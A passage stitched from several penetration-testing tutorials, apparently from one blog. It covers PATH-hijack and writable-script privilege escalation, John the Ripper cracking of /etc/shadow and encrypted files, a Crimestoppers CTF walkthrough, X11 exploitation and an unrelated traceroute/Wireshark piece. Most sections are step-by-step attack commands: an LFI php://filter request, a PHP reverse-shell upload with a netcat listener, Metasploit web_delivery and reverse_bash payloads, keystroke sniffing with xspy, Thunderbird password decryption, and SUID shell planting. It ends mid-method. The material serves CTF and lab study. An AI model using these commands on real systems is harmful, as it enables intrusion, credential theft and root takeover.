NOTE: symlink is also known as symbolic links that will work successfully if the directory has full permission. In Ubuntu, we had given permission 777 to /script directory in the case of a symlink.

Thus we saw to an attacker can manipulate environment variable PATH for privileges escalation and gain root access.

Operating Skuzzy CTF

Skuzzyis also a CTF challenge hosted by vulnhub and when you will solve this challenge you will notice that for the privilege escalation we have manipulated environment PATH for id which is a system binary. It is also as similar to above Lab set-up with little bit modification.

LAB SET_UP

pwd

mkdir script

cd /script

nano demo.c

As you can observe in our demo.c file we are calling id command which is system binaries.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

gcc demo.c -o shell2

chmod u+s shell2

ls -la shell2

Penetrating victim’s VM Machine

find / -perm -u=s -type f 2>/dev/null

Then we move into /home/raj/script and saw an executable file “shell2”. So we run this file, it looks like the file shell2 is trying to run id and this is a genuine file inside /bins.

cd /home/raj/script

./shell2

Echo command

cd /tmp

echo “/bin/sh” > id

chmod 777 id

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./shell2

whoami

Operating Lazy HTB

Lazyis another CTF challenge hosted by Host The Box and when you will solve this challenge you will realize that for the privilege escalation you have manipulated environment PATH for cat command which is a system binary. It is also as similar to above Lab set-up with little bit modification.

LAB SET_UP

Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read the content from inside etc/passwd file.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

gcc demo.c -o raj

chmod u+s raj

ls -la raj

Penetrating victim’s VM Machine

Again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

find / -perm -u=s -type f 2>/dev/null

Here we can also observe /home/raj/script/raj having suid permissions, then we move into /home/raj/script and saw an executable file “raj”. So when we run this file it put-up etc/passwd file as result.

cd /home/raj/script/

./raj

Nano Editor

cd /tmp

nano cat

Now type /bin/bash when terminal get open and save it.

chmod 777 cat

ls -al cat

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./raj

whoami

Operating PwnLab CTF

PawLabis another CTF challenge hosted by vulnhub and when you will solve this challenge you will realize that for the privilege escalation you have manipulated environment PATH for cat command which is a system binary. It is also as similar to above Lab set-up with little bit modification. This set-up is not exactly as PwnLab setup but like an overview.

LAB SET_UP

Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read msg.txt which is inside /home/raj but there is no such file inside /home/raj.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

gcc demo.c -o ignite

chmod u+s ignite

ls -la ignite

Penetrating victim’s VM Machine

Once again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

find / -perm -u=s -type f 2>/dev/null

Here we can also observe /home/raj/script/ignite having suid permissions, then we move into /home/raj/script and saw an executable file “ignite”. So when we run this file it put-up an error “cat: /home/raj/msg.txt” as result.

cd /home/raj/script

./ignite

Vi Editor

cd /tmp

vi cat

Now type /bin/bash when terminal gets open and save it.

chmod 777 cat

ls -al cat

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./ignite

whoami

We know the importance of John the ripper in penetration testing, as it is quite popular among password cracking tool. In this article, we are introducing the John the ripper and its various usage for beginners.

What is John the Ripper?

John the Ripper is a free password cracking software tool developed by Openwall. Originally developed for Unix Operating Systems but later on developed for other platforms as well. It is one of the most popular password testings and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types commonly found in Linux, Windows. It can also be to crack passwords of Compressed files like ZIP and also Documents files like PDF.

Where to get John the Ripper?

John the Ripper can be downloaded from Openwall’s Website here.

Or from the Official John the Ripper Repo here

John the Ripper comes Preinstalled in Linux Kali and can be run from the terminal as shown below:

John the Ripper works in 3 distinct modes to crack the passwords:

1. Single Crack Mode

2. Wordlist Crack Mode

3. Incremental Mode

John the Ripper Single Crack Mode

In this mode John the ripper makes use of the information available to it in the form of a username and other information. This can be used to crack the password files with the format of

Username: Password

For Example: If the username is “Hacker” it would try following passwords:

hacker

HACKER

hacker1

h-acker

hacker=

We can use john the ripper in Single Crack Mode as follows:

Here we have a text file named crack.txt containing the username and password, where the password is encrypted in sha1 encryption so to crack this password we will use:

Syntax: john [mode/option] [password file]

john --single --format=raw-sha1 crack.txt

As you can see in the screenshot that we have successfully cracked the password.

Username: ignite Password: IgNiTe

John the Ripper Wordlist Crack Mode

In this mode John the ripper uses a wordlist that can also be called a Dictionary and it compares the hashes of the words present in the Dictionary with the password hash. We can use any wordlist of our choice. John also comes in build with a password.lst which contains most of the common passwords.

Let’s see how John the Ripper cracks passwords in Wordlist Crack Mode:

Here we have a text file named crack.txt containing the username and password, where the password is encrypted in sha1 encryption so to crack this password we will use:

Syntax: john [wordlist] [options] [password file]

john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt

As you can see in the screenshot, john the Ripper have cracked our password to be asdfasdf

Cracking the User Credentials

We are going to demonstrate two ways in which we will crack the user credentials of a Linux user.

Before that we will have to understand, what is a shadow file?

In Linux operating system, a shadow password file is a system file in which encrypted user password is stored so that they are not available to the people who try to break into the system. It is located at /etc/shadow.

First Method

Now, for the first method, we will crack the credentials of a particular user “pavan”.

Now to do this First we will open the shadow file as shown in the screenshot.

And we will find the credentials of the user pavan and copy it from here and paste it into a text file. Here we have the file named crack.txt.

Now we will use john the ripper to crack it.

john crack.txt

As you can see in the screenshot that john the ripper has successfully cracked the password for the user pavan.

Second Method

Now, for the second method, we will collectively crack the credentials for all the users.

To do this we will have to use a john the ripper utility called “unshadow”.

unshadow /etc/passwd /etc/shadow > crack.txt

Here the unshadow command is combining the /etc/passwd and /etc/shadow files so that John can use them to crack them. We are using both files so that John can use the information provided to efficiently crack the credentials of all users.

Here is how the crack file looks after unshadow command.

Now we will use john to crack the user credentials of all the users collectively.

john –wordlist=/usr/share/john/password.lst crack.txt

As you can see from the provided screenshot that we have discovered the following credentials:

User	Password
Raj	123
Pavan	Asdfasdf
Ignite	Yellow

Stopping and Restoring Cracking

While John the ripper is working on cracking some passwords we can interrupt or pause the cracking and Restore or Resume the Cracking again at our convenience.

So while John the Ripper is running you can interrupt the cracking by Pressing “q” or Crtl+C as shown in the given screenshot

Now to resume or restore the cracking process we will use the --restore option of John the ripper as shown in the screenshot

Now we will decrypt various hashes using John the Ripper

SHA1

To decrypt SHA1 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha1 crack.txt

As you can see in the given screenshot that we have the username pavan and password as Hacker

MD5

To decrypt MD5 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-md5 crack.txt

As you can see in the given screenshot that we have the username pavan and password as P@ssword.

MD4

To decrypt MD4 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-md4 crack.txt

As you can see in the given screenshot that we have the username pavan and password as Rockyou

SHA256

To decrypt SHA256 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 crack.txt

As you can see in the given screenshot that we have the username pavan and password as pAsSwOrD

RIPEMD128

To decrypt RIPEMD128 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=ripemd-128 crack.txt

As you can see in the given screenshot that we have the username pavan and password as password123

Whirlpool

To decrypt whirlpool encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=whirlpool crack.txt

As you can see in the given screenshot that we have the username pavan and password as password666

View All Formats

John the Ripper support many encryptions some of which we showed above. To view all the formats it supports:

john –list=formats

Hope, you can take reference of this article while using John the ripper, More on John the Ripper will be in the Next Part.

Hello Friends!! Today we are going to discuss working with traceroute using UDP/ICMP/TCP packets with help of Wireshark.

Traceroute or Tracert: It is a CUI based computer network diagnostic tools used in UNIX and Windows-like system respectively. It traces the path of a packet from the source machine to an Internet host such as Goole.com by calculating the average time taken each hop. Traceroute sends a UDP packet to the destination by taking benefit of ICMP’s messages.It uses the ICMP error-reporting messages –Destination Unreachable and Time exceeded.

TTL:The time-to-live value, also known as hop limit, is used in determining the intermediate routers being traversed between source to the destination.

Hop: A hop is one portion of the path between source and destination. Data packets pass through bridges, routers and gateways as they travel between source and destination.On the internet, before the data reach its final destination, it goes through several routers and a hop occurs when an incoming packet is forwarded to the next router.

Asterisk (*): Denotes probe timeout which means that the router at that hop doesn't respond to the packet received from the source used for the traceroute due to firewall filter.

Working of Traceroute

Read below steps:

Traceroute sends a UDP packet with a TTL = 1 from the source to destination.
When the first router receives the UDP packet it reduce the TTL value by 1 (1-1=0) then drop the packet and sends an ICMP message “Time exceeded” to the source. Thus Traceroute makes a list of the router’s address and the time taken for the round-trip.

The TTL time exceeded ICMP message is sent after the TTL value of a UDP packet gets zero. In typical condition, a network doesn't have such a diameter that lead the TTL=0. This could be possible when there is a routing loop. In this case, as the packet is sent back and forth between the looping points, the TTL keeps getting decremented until it becomes zero. And at last source receives ICMP Error message sent by the router.

Again source device sends two more packets in the same way to get an average value of the round-trip time and again TTL gets zero when reached to the 2^nd router and response through ICMP error message time exceeds.
Traceroute keeps on doing this, and record the IP address and name of every router until the UDP packets reach to the destination address. Once it reached at the destination address reached, Time exceeded ICMP message is NOT sent back to the source.
Since Traceroute uses the random port for sending UDP packets as result destination machine will drop the packet and send a new ICMP error message-Destination Unreachable to the source which indicates the UDP packets has reached to the destination address.

Tracert with Wireshark

As discusses above tracert is CLI utility for windows system to trace the path of a packet from source to destination. So here with help of the following command, we can observe the path of packet travels to reach Google DNS.

Syntax:tracert [options] Host IP

tracert 8.8.8.8

tracert -d 8.8.8.8

Traceroute generates a list of each hop by entering IP of routers that traversed between source and destination and average round-rip time. As result hop 22 denotes entry of destination i.e. Google DNS.

In order to notice the activity of traceroute, we have turned on Wireshark in the background.

Note: Result of tracert can vary each time for hop count but does not go beyond 30 hops because it is maximum hop limit.

At Wireshark we notice following points:

· ICMP echo request packet is used instead of UDP to send DNS query.

· The packet first goes from source 192.168.1.101 to first router 192.168.1.1 having ICMP echo request packet with TTL=1

· Router will drop that packet and sent ICMP Time Exceed error message to the source.

· All this happens 3 times before the source machine sends next packet by incrementing TTL value by 1 i.e. TTL=2.

Form this image we can observe ICMP echo reply message is sent from 8.8.8.8 (destination) to 192.168.1.101 (source) for TTL 22.

Traceroute with Wireshark (via UDP packets)

As discussed above traceroute in utility for Unix -like the system to trace the path of a packet from source to destination. So here with help of the following command, we can observe the path of packet travels to reach Google DNS.

Syntax:traceroute [options] Host IP

traceroute 8.8.8.8

Traceroute generates a list of each hop by entering IP of routers that comes between source and destination and average round-rip time. As result hop 21 denotes entry of destination i.e. Google DNS.

In order to notice the activity of traceroute, we have turned on Wireshark in the background.

Note: Result of traceroute can vary each time for hop count but does not go beyond 30 hops because it is maximum hop limit.

At Wireshark we notice following points:

UDP packet is used to send DNS query with help of 32-bit payload.
The packet first goes from source 192.168.1.101 to first router 192.168.1.1 having ICMP request packet with TTL=1
Router will drop that packet and sent ICMP Time Exceed error message to the source.
All this happens 3 times before the source sent next packet with increment TTL value by 1 i.e. TTL=2.

In tracert we have seen that each TTL value between source to the first router proceeds 3 times, similarly same techniques followed by UDP. To demonstrate this we have explored UDP packets 5,6,7 and 8th continuously.

In the 5^th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33435 and count as Hop #1, attempt #1.

In the 6^th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33436 and count as Hop #1, attempt #2.

Similarly, in the 7^th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33437 and count as Hop #1, attempt #3.

In the 8^th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33436 and count as Hop #2, attempt #1 and repeat so on process till reaches the destination.

In packet 79^th we observe the last hop captured was hop #10 attempt #3 when the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33464 and Time exceeded ICMP message is NOT sent back to the source after this.

As result, at last source received ICMP message Destination Port Unreachable which means our UDP packet reaches on the destination address.

At last from given below image we observed following:

· Source sent DNS query to the router for DNS lookup 8.8.8.8

· Router sent a response to source as the answer of DNS Name Google-Public-DNS-google.com

Traceroute with Wireshark (via ICMP packets)

As you know by default traceroute use UDP packet but with help of -I option you can make it work as tracert which uses ICMP request packet.

traceroute -I 8.8.8.8

It generates a list of each hop by entering IP of routers that comes between source and destination and average round-rip time. As result hop 22 denotes entry of destination i.e. Google DNS. In order to notice the activity of traceroute, we have turned on Wireshark in the background.

At Wireshark we notice following points:

First ICMP echo request packet will be sent to the first router with TTL 1 and it will send back an ICMP error message time exceed which follow same technique as explain above in tracert with Wireshark.

At last from given below image we observed following:

· ICMP echo reply message is sent from 8.8.8.8 (destination) to 192.168.1.101 (source) for TTL 22.

· Source sent DNS query to the router for DNS lookup 8.8.8.8

· Router sent the response to source as the answer of DNS Name Google-Public-DNS-google.com

Traceroute with Wireshark (via TCP packets)

As you know by default traceroute use UDP packet with use ICMP error message for generating a response but with help of -T option you can use TCP packet, which uses syn request packet via port 80. It is most useful in diagnosing connection issues to a specific service eg. Web server.

tcptraceroute - 8.8.8.8

traceroute -T 8.8.8.8

As we know the maximum hop is 30 and but here till 30^thhop we didn't find desirable output. TCP traceroute basically follow TCP half communication and waits for the sys-ack packet from destination till the last hop.

In order to notice the activity of tcp traceroute, we have turned on Wireshark in the background where we noticed that, it work same as UDP but here syn packet are used to send the request to the destination. Tcptraceroute does not measure the time it takes to complete the three-way handshake because that never occurs in such situation. It only measures the time from the initial SYN to the SYN/ACK.

Since Wireshark also didn’t noticed any syn-ack packet from destination to source, therefore, Tcptraceroute didn’t edit destination response in its record list this is due to because it is useful while diagnosing web server.

Therefore let's check the path of Google.com and notice the behaviour of tcptraceroute. And you compare both result and behaviour of TCP in case of Google DNS server and Google web server.

tcptraceroute google.com

Here we can clearly observe the response of destination machine through SYN, ACK and a complete entry recorded by traceroute.

It is as similar as above, the source sent the TCP-SYN packet to the destination machine on port 80 and received ICMP error message from router for time exceed and repeat the process till it receives ACK_SYN form destination.

Here we can observe ACK-SYN packet from the destination (172.168.161.14) is sent to source (192.1681.103) from port 80 and source again sent RST packet to the destination via port 80.

This entry will get recorded by traceroute in its record list.

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Crimestoppers of Hack The Box. Solving this lab is not much easy, all you need is your penetration skill to solve this challenge.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Crimestoppers has IP: 10.10.10.69.

As we knew the initial stage is enumeration; therefore use nmap Aggressive scan for gathering target’s machine and running services information.

Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image opened as shown below. Here, we can see that it has two pages: home and upload but didn’t find anything suspicious.

So next, we use the dirb tool of kali to enumerate the directories and found some important directories such as http://10.10.10.80/?op=view and went on the web browser to explore them.

At upload, you can upload any comment as a Tip, in order to provide some information. So we try to upload malicious code here but get failed each time. L

If you will observe the URL http:// 10.10.10.80/?op=upload then you will realize that its look like that LFI.

But it was not easy that much to exact information by exploiting LFI with help of ../etc/password therefore by making little bit more effort and taking help from my previous article. We used curl command to find out the data from inside it with the help of PHP base64-encode.

curl http://10.10.10.80/?op=upload =php://filter/convert.base64-encode/resource=upload

As result, it returns base64 encode text which we need to decode.

To decode bsae64 encoded text follow below syntax and found a PHP script that was pointing toward some kind of token and secretname which was a link to uploads directory.

Syntax: echo BASE64TEXT | base64 -d

After struggling a lot, finally, we successfully uploaded our php backdoor with help burp suite. Follow given step to upload php web shell.

Open php-reverse-shell.php which is inbuilt in kali Linux from path: /user/share/webshells/php and modify ATTACKER’s IP and save this file on the desktop. Here we have renamed it as shell.php and compress this file.

zip -0 shell.zip shell.php

In order to capture the request web browser, enter the information for Tips and name then turn burp suite and click on Send Tip.

Now in order to upload the content of our php backdoor through burp select the string “shell” for name = tip as shown below.

And choose php file to paste it content at the place of shell.

As you can observe that we have successfully uploaded our malicious PHP content here.

Now forward the intercepted request and you will get secretname for the uploaded file as highlighted, copy it. Then forward the request again, it will give the success.txt message and at last forward the request one more time.

Do not forget to launch netcat for reverse connection before executing your uploaded file.

nc -lvp 1234

Now open the browser and execute the following command that contains secretname of the uploaded file (PHP backdoor) and you will get netcat session for reverse connection.

http://10.10.10.80/?op=zip://uploads/10.10.14.25/e0d7a2f54d16633eb0eddfb10efed8ea5a200274%23shell

python -c 'import pty; pty.spawn("/bin/sh")'

Because we love to work with meterpreter session therefore with help of metasploit web_delivary module we generate malicious python code as shown.

msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25

msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25

msf exploit(multi/script/web_delivery) > exploit

Paste copied code in netcat which will provide meterpreter session inside Metasploit framework.

HURRAYYYY!!! We got our meterperter session, now let’s grab the user.txt file first.

Inside path: /home/dom I found user.txtfile and used cat "filename" command for reading this file.

cd home

cd dom

cat user.txt

Great!! We got our 1^st flag successfully

Now we need to find root.txt file to finish this challenge and believe me it was not easy until you won’t the hint which is hidden by the author. We try every possible method to escalated privilege to gain the root access but it was quite different from previous one.

After penetrating more and more we found a “36jinndk.default” from inside /home/dom/.thunderbird, which was encrypted file for Thunderbird profile, therefore, we download it in our local system.

meterpreter> download 36jinndk.default /root/Desktop/36

Since it was encrypted file of Thunderbird profile so with help of Google we found a python script from this Link: https://github.com/unode/firefox_decrypt for its decryption.

With help of the following command, we successfully found password: Gummer59

python firefox_decrypt.py /root/Desktop/36

We applied this password to escalated user:dom with help of the following command and then move into crimestoppers.htb directory it looks like his mailbox directory where we found so many files such INBOX.

su dome

Password:

cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb

First we look into INBOX for any hint for root.txt but didn't find something related to root.txt flag similarly we open other files but didn’t found anything.

At last, we open Drafts-1 and read the following line which looks like a hint of root access.

“I don't trust them and run rkhunter, it reported that there a rootkit installed called:apache_modrootme backdoor” and its execution method.

So we explore following the path we found the access.log.2.gz file since it was a compressed file, therefore, it was better to copy it inside /tmp for further steps.

cd /var/log/apache2

cp access.log.2.gz/tmp

Now let’s move inside /tmp to extract the copied file inside it with the help of gunzip.

gunzip access.log.2.gz

cat access.log.2.gz

You can observe the log for a command “FunSociety” which has been executed several times.

As per the message read from DRAFT-1 we run netcat on localhost on port 80 get root access with help of following commands when executed.

nc localhost 80

get FunSociety

Now let’s get the root.txt and finish this task.

cd /root

cat root.txt

BOOOOOM!!!! We hit the Goal and completed both task.J

We learned most of the basic information on John the Ripper in our Previous Article which can be found here. In this article we will use John the Ripper to crack the password hashes of some of the file formats like zip, rar, pdf and much more.

To crack theses password hashes, we are going to use some of the inbuilt and some other utilities which extract the password hash form the locked file. There are some utilities that come inbuilt with john which can be found using the following command.

locate *2john

As you can see that we have the following utilities, we will demonstrate some of them here.

Cracking the SSH Password Hash

John the Ripper can crack the SSH private key which is created in RSA Encryption. To test the cracking of the private key, first we will have to create a set of new private keys. To do this we will use a utility that comes with ssh, called “ssh-keygen”.

ssh-keygen

After opening, it asks for the location at which we want the public/private rsa key pair to store? You can use any location or you can leave it as default.

After that it asks for the passphrase, after entering the password again, we successfully generate the rsa private key. (Refer the Screenshot)

When you will try to open the file, you will be greeted by the following prompt.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “ssh2john”.

Syntax: ssh2john [location of key]

ssh2john /home/pavan/.ssh/id_rsa > crack.txt

You can see that we converted the key to a crack able hash and then entered it into a text file named id_rsa.txt.

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt

Great! We have successfully cracked the passphrase used to create the private ssh key to be “password123”

Cracking the KeepPass2 Password Hash

John the Ripper can crack the KeepPass2 key. To test the cracking of the key, first we will have to create a set of new keys. To do this we will use a utility that is called “kpcli”.

kpcli

Now we will create a database file using command “saveas” and naming the database file as ignite.kdb and entering a passcode to secure it.

When you will try to open the file, you will be greeted by the following prompt.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “keepass2john”.

Syntax: keepass2john [location of key]

keepass2john ignite.kdb > crack.txt

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the key to be “12345678”

Cracking the RAR Password Hash

Now we will crack some compressed files, to do that we will have to create a file to be compressed so let’s do that using echo command as shown in the given screenshot.

You can see that we created a file.txt which we will be using to create compressed files.

echo hackingarticles.in > file.txt

John the Ripper can crack the RAR file passwords. To test the cracking of the password, first let’s create a compressed encrypted rar file.

rar a -hpabc123 file.rar file.txt

· a = Add files to archive

· hp[password] = Encrypt both file data and headers

This will compress and encrypt our file.txt into a file.rar. So, when you will try to open the file, you will be greeted by the following prompt.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “rar2john”.

Syntax: rar2john [location of key]

rar2john file.rar > crack.txt

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the key to be “abc123”

Cracking the ZIP Password Hash

John the Ripper can crack the ZIP file passwords. To test the cracking of the password, first let’s create a compressed encrypted zip file.

zip -er file.zip file.txt

e = Encrypt
r = Recurse into directories

This will compress and encrypt our file.txt into a file.zip. So, when you will try to open the file, you will be greeted by the following prompt.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “zip2john”.

Syntax: zip2john [location of key]

zip2john file.zip > crack.txt

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the key to be “654321”

Cracking the 7-Zip Password Hash

John the Ripper can crack the 7-Zip file passwords. To test the cracking of the password, first let’s create a compressed encrypted 7z file.

7z a -mhe file.7z file.txt -p”password”

• a = Add files to archive

• m = Set compression Method

• h = Calculate hash values for files

• e = Encrypt file

• p = set Password

This will compress and encrypt our file.txt into a file.7z. So, when you will try to open the file, you will be greeted by the following prompt.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “7z2john”. This is not inbuilt utility, It can be downloaded from here.

Syntax: zip2john [location of key]

python 7z2john.py file.7z > crack.txt

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the key to be “password”

Cracking the PDF Password Hash

John the Ripper can crack the PDF file passwords. You can encrypt your pdf online by using this website. This will compress and encrypt our pdf into a password protected file.pdf. So, when you will try to open the file, you will be greeted by the following prompt.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “pdf2john”. This is not inbuilt utility, it can be downloaded from here.

Syntax: pdf2john [location of key]

python pdf2john.py file.pdf > crack.txt

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the key to be “password123”.

Cracking the PuTTY Password Hash

John the Ripper can crack the PuTTY private key which is created in RSA Encryption. To test the cracking of the private key, first we will have to create a set of new private keys. To do this we will use a utility that comes with PuTTY, called “PuTTY Key Generator”.

Click on “Generate”. After Generating the key, we get a window where we will input the key passphrase as shown in the screenshot.

After entering the passphrase, click on Save private key to get a private key in the form of a .ppk file

After generating transfer this .ppk file to Kali Linux.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “putty2john”.

Syntax: putty2john [location of key]

putty2john file.ppk > crack.txt

You can see that we converted the key to a crack able hash and then entered it into a text file named crack.txt.

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt

Great! We have successfully cracked the passphrase used to create the private PuTTY key to be “password”.

Cracking the “Password Safe” Password Hash

John the Ripper can crack the Password Safe Software’s key. To test the cracking of the key, first we will have to create a set of new keys. To do this we will install the Password Safe Software on our Windows 10 System.

To get a new key, Click on “New”

In this prompt, check the Show Combination Box. After that Enter the Passphrase you want to use to generate the key. This will generate a .psafe3 file.

After generating transfer this .safe3 file to Kali Linux.

Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “pwsafe2john”.

Syntax:pwsafe2john [location of key]

pwsafe2john ignite.psafe3 > crack.txt

You can see that we converted the key to a crack able hash and then entered it into a text file named crack.txt.

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the private pwsafe key to be “password123”

X is an architecture-independent system for remote graphical user interfaces and input device capabilities. Each person using a networked terminal has the ability to interact with the display with any type of user input device.

Source: Wikipedia

In most of the cases the X’s Server’s access control is disabled. But if enabled, it allows anyone to connect to the server. This Vulnerability is called X11 Server Unauthenticated Access Open. You can get more information form here.

For a proper demonstration, we will have to create up a Lab with this Vulnerability.

Lab Setup

We will use Ubuntu 14.04 system for this Vulnerable Lab setup. After the basic installation of the Ubuntu Server, we will focus on locating the “lightdm.conf” file. The Location of this file is: /etc/lightdm/lightdm.conf. But if you can’t seem to find this at that location, you can get it for yourself from here.

To edit the file, we will use gedit.

gedit /etc/lightdm/lightdm.conf

To create the vulnerability, we will uncomment the following line:

xserver-allow-tcp=true

Now that we have made changes in the conf file, to make them come in effect, we will restart the lightdm service

Command: service lightdm restart

Now when the lightdm service restarts, we will disable the access control. This will allow clients on the network to get connected to the server.

Command: xhost +

And That’s it. We have successfully created the X11 Vulnerable Server.

Penetration Testing of X11 Server

To begin the Penetration Testing, we will start with the nmap scan.

nmap -sV 192.168.1.109

As we can see from the screenshot that we have the TCP port 6000 open on the Server (192.168.1.109). Also, it is running the X11 service on that port.

Nmap have a script, which checks if the attacker is allowed to connect to the X Server. We can check if the X Sever allows us the connection as shown below.

nmap 192.168.1.109 -p 6000 --script x11-access

We can clearly see from the screenshot provided that the X Server allows us the access.

XWININFO

This is the built-in utility in Kali, it shows the windows information for X Service. In Penetration Testing, xwininfo can be used to get the information about the windows opened on the target system.

Command: xwininfo -root -tree -display 192.168.1.109:0

· Root = specifies that X's root window is the target window

· Tree = displays the names of the windows

· Display = specify the server to connect to

We can extract much information from the screenshot above like:

· Victim has Gnome Terminal Opened

· Victim is a VMware user

· Victim has Nautilus (Ubuntu File Browser) Opened

XWD

It is a X Window System utility that helps in taking screenshots. On our Kali System we will use the xwd to take the screenshot of Xserver. This utility takes the screenshots in xwd format.

xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd

Root = indicates that the root window should be selected for the window dump

Screen = indicates that the GetImage request used to obtain the image

Silent = Operate silently, i.e. don't ring any bells before and after dumping the window.

Display = specify the server to connect to

After running the aforementioned command, we will successfully capture a screenshot form the victim system.

Here we have the screenshot captured by the xwd, but it is in .xwd format, so to view it we will have to convert it to a viewable format like .png

convert screenshot.xwd screenshot.png

This command will convert the xwd to a png file. After running this command, we can find out screenshot in png file format as shown below:

On opening the png file we can see that the xwd tool have successfully captured the screenshot of the target system.

XSPY

It is a built-in tool Kali Linux for the X Window Servers. XSPY is a sniffer, it sniffs keystrokes on the remote or local X Server.

Command: xspy 192.168.1.109

As we can see from the given screenshot that we have the got the user password as the victim have unknowingly entered the password. Also see that the password is not as visible on the Server terminal but as the xspy captures the keys typed, hence we have the password typed.

Getting the Shell through Metasploit

Now we will use the X11 Keyboard Command Injection module of the Metasploit Framework. This module exploits open X11 Server by connecting and registering a virtual keyboard. Then the Virtual Keyboard is used to open an xterm or gnome terminal and then type and execute the payload.

NOTE: As X Server is a visual service, while the executing of the module will take place, every task occurring on the Target System will be visible to the Victim.

Now, after opening the Metasploit Framework, we will use the payload as shown:

use exploit/unix/x11/x11_keyboard_exec

msfexploit(unix/x11x11_keyboard_exec) > set rhost 192.168.1.109

msfexploit(unix/x11x11_keyboard_exec) > set payload cmd/unix/reverse_bash

msfexploit(unix/x11x11_keyboard_exec) > set lhost 192.168.1.120

msfexploit(unix/x11x11_keyboard_exec) > set lport 4444

msfexploit(unix/x11x11_keyboard_exec) > set time_wait 10

msfexploit(unix/x11x11_keyboard_exec) > run

After running the module, it will first connect to the Server and search for xterm and open it.

Then after waiting for 10 seconds, it will start typing the script command on the xterm.

After executing this command, xterm will get closed, but it will provide a command shell to the Attacker as shown.

In Linux everything is a file, including directories and devices that have permissions to allow or restricted three operations i.e. read/write/execute. When admin set permission for any file, he should be aware of Linux users to whom he is going allow or restrict all three permissions.

In this article, we are going to discuss Linux privilege escalation through writable file/script. To know more about Linux system permission to read this article.

Table of content

· Escalate root via writable script in 5 different methods

· Copy /bin/sh inside /tmp

· Set SUID bit for /bin/dash

· Give ALL permission to logged user through sudoers

· Set SUID bit for /bin/cp

· Malicious code for reverse connection.

Let’s start!!!

Start yours attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then by using the following command, we can enumerate all binaries having writable permission.

find / -writable -type f 2>/dev/null | grep -v "/proc/"

As you can observe that it has shown a python file which is stored inside /lib/log. When we explored that path we notice permission 777 for sanitizer.py

So here the following script was added by admin to cleanup all junk file from inside /tmp and these type of files depends upon specific time interval for executions.

Now if an attack identify such types of situation in victim’s machine then he can destroy his system by escalating root privileges in following ways

1^st Method

There so many methods to gain root access as in this method we copied /bin/sh inside /tmp and enabled SUID for /tmp/sh. It is quite simple, first, open the file through some editor for example nano sanitizer.py and replace“rm -r /tmp/*” from the following line as given below

os.system(‘cp /bin/sh /tmp/sh’)

os.system(‘chmod u+s /tmp/sh’)

After some time it will create an sh file inside /tmp directory having SUID permission and when you will run it you will give root access.

cd /tmp

./sh

whoami

As you can confirm this from given below image.

2^nd Method

Similarly, you can also replace“rm -r /tmp/*” from the following line as given below.

os.system(‘chmod u+s /bin/dash)

